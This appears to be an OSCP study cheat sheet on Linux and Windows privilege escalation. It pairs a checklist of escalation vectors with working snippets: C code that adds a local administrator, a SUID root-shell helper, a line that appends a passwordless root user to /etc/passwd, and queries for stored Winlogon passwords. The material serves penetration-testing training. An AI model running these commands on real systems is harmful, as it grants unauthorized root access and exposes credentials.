OSCP
Search…
Priv Escalation
Privilege Escalation
GTFOBins
https://guif.re/linuxeop
guif.re
https://guif.re/windowseop
guif.re
FuzzySecurity | Windows Privilege Escalation Fundamentals
Linux Privilege Escalation
- sudo -l
- Kernel Exploits
- OS Exploits
- Password reuse (mysql, .bash_history, 000-default.conf...)
- Known binaries with suid flag and interactive (nmap)
- Custom binaries with suid flag either using other binaries or with command execution
- Writable files owned by root that get executed (cronjobs)
- MySQL as root
- Vulnerable services (chkrootkit, logrotate)
- Writable /etc/passwd
- Readable .bash_history
- SSH private key
- Listening ports on localhost
- /etc/fstab
- /etc/exports
- /var/mail
- Process as other user (root) executing something you have permissions to modify
- SSH public key + Predictable PRNG
- apt update hooking (Pre-Invoke)
- Capabilities
Windows Privilege Escalation
- Kernel Exploits
- OS Exploits
- Pass The Hash
- Password reuse
- DLL hijacking (Path)
- Vulnerable services
- Writable services binaries path
- Unquoted services
- Listening ports on localhost
- Registry keys
Kernel Exploits
1
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
2
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
3
http://www.fuzzysecurity.com/tutorials/16.html
Copied!
​
Windows Add User
1
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
2
​
3
int main ()
4
{
5
int i;
6
i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
7
return 0;
8
}
Copied!
​
SUID Change
1
SUID
2
​
3
Set owner user ID.
4
​
5
int main(void){
6
setresuid(0, 0, 0);
7
system("/bin/bash");
8
}
9
​
Copied!
1
Privilege Escalation:
2
#Find Binaries that will execute as the owner
3
find / -perm -u=s -type f 2>/dev/null
4
​
5
#Find binaries that will execute as the group
6
find / -perm -g=s -type f 2>/dev/null
7
​
8
#Find sticky-bit binaries
9
find / -perm -1000 -type d 2>/dev/null
10
​
11
find / -perm -4000 2>/dev/null
12
​
13
writable by everyone
14
find / -writable -type f 2>/dev/null
15
​
16
World writeable directories
17
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
18
​
19
World writeable files
20
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
21
​
22
Writeable config files
23
find /etc/ -writable -type f 2>/dev/null
24
​
25
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
26
​
Copied!
Window Exploit Suggester
1
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
2
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
Copied!
Windows Priv Escalation
1
AlwaysInstallElevated
2
Check if the following registry settings are set to "1"
3
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
4
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
5
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
6
​
Copied!
​
Basic Linux Enumeration
1
Distribution type & kernel version
2
cat /etc/*release*
3
uname -a
4
rpm -q kernel
5
dmesg | grep -i linux
6
​
7
Default writeable directory / folder
8
/tmp
9
/dev/shm
10
​
11
Search for passwords
12
Search for password within config.php
13
grep -R 'password' config.php
14
​
15
Find possible other writeable directory / folder
16
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
17
​
18
Service(s) running as root user
19
ps aux | grep root
20
ps -ef | grep root
21
​
22
Installed applications
23
ls -lah /usr/bin/
24
ls -lah /sbin/
25
dpkg -l
26
rpm -qa
27
ls -lah /var/cache/apt/archivesO
28
ls -lah /var/cache/yum/
29
​
30
Scheduled jobs
31
crontab -l
32
ls -la /etc/cron*
33
ls -lah /var/spool/cron
34
ls -la /etc/ | grep cron
35
cat /etc/crontab
36
cat /etc/anacrontab
37
​
38
Find pattern in file:
39
grep -rnw '/etc/passwd' -e 'root'
40
​
41
Sticky bit, SGID, SUID, GUID
42
Sticky bit
43
find / -perm -1000 -type d 2>/dev/null
44
​
45
SGID (chmod 2000)
46
find / -perm -g=s -type f 2>/dev/null
47
​
48
SUID (chmod 4000)
49
find / -perm -u=s -type f 2>/dev/null
50
find /* -user root -perm -4000 -print 2>/dev/null
51
​
52
SUID or GUID
53
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
54
​
55
Add user to /etc/passwd and root group
56
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
57
​
Copied!
​
Last modified 2yr ago
Copy link
Contents
Privilege Escalation